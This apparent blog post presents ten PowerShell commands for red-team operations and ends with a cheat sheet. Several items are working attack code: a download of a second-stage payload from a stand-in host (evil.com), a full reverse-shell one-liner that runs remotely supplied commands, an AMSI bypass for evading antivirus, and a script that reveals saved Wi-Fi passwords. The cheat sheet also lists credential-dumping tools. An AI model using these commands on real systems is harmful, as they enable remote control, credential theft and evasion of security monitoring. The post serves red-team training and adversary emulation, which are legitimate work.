⚔️ Top 10 PowerShell Commands Every Red Teamer Should Know (2025 Edition)
“Attackers don’t bring malware; they bring PowerShell.” – Every SOC Analyst Ever
PowerShell has become a critical weapon in a red teamer's arsenal. Native to Windows, stealthy, and powerful, it’s the perfect post-exploitation and recon tool. In this blog, we’ll cover 10 practical PowerShell commands, what they do, and when/how to use them effectively in red team operations or adversary emulation.
🔍 1. System Info Discovery
Get-ComputerInfo | Select-Object CsName, WindowsVersion, OsName, OsArchitecture
This command fetches essential target system info – great for situational awareness once you have code execution.
🕸️ 2. Network Recon
Get-NetTCPConnection | Group-Object State
Shows all active TCP connections and their states. Helps identify open ports, listeners, or suspicious persistence.
👥 3. Enumerate Domain Users
Get-ADUser -Filter * | Select-Object Name,SamAccountName,Enabled
Pulls all domain users from AD (requires RSAT module or AD shell). Helps find high-value targets.
💡 Tip: Use this after pivoting into a domain-joined machine.
🔑 4. Extract Saved Wi-Fi Passwords
(netsh wlan show profiles) |
ForEach-Object {
$profile = ($_ -split ':')[1].Trim()
netsh wlan show profile $profile key=clear
}
Grabs saved wireless network passwords—useful for lateral movement in hybrid environments.
🎣 5. Invoke-WebRequest for Payload Delivery
Invoke-WebRequest -Uri http://evil.com/payload.exe -OutFile payload.exe
Downloads files from remote servers. Useful in post-exploitation to pull second-stage malware or tools.
🔁 6. Reverse Shell One-Liner
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
This is a weaponized reverse shell payload in one line. Use wisely in labs or approved test environments.
🦠 7. Bypass AMSI (Antimalware Scan Interface)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Bypasses Windows Defender AMSI, allowing potentially malicious scripts to run undetected (until caught 😈).
⚠️ Ethical use only – don’t misuse this.
🗂️ 8. Enumerate All Running Processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
Useful to identify high CPU processes (possibly AV or forensic tools) or background services of interest.
🔐 9. List All Services (Check for Misconfig)
Get-Service | Where-Object {$_.Status -eq "Running"} | Select Name, DisplayName, Status
Look for misconfigured or vulnerable services (like weak ACLs) for potential service hijacking.
📜 10. ScriptBlock Logging & Security Checks
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational"
Use this to check whether your commands are being logged. Defensive testing is just as important as offense.
🧠 Final Thoughts
PowerShell is native, powerful, and deadly in the wrong hands. Understanding its full capabilities lets you better emulate advanced adversaries—and also defend against them.
✅ Learn. Practice. Simulate.
Train in safe environments like:
📚 Bonus: PowerShell Red Team Cheat Sheet
| Category | Command Example |
|---|---|
| Recon | systeminfo, ipconfig /all |
| User enum | net user, Get-LocalUser |
| Credential dump | mimikatz, Get-ADReplAccount |
| File transfer | Invoke-WebRequest, CertUtil |
| Shells | powershell reverse shell, nishang |
| AV Evasion | AMSI bypass, obfuscation |
Comments
Post a Comment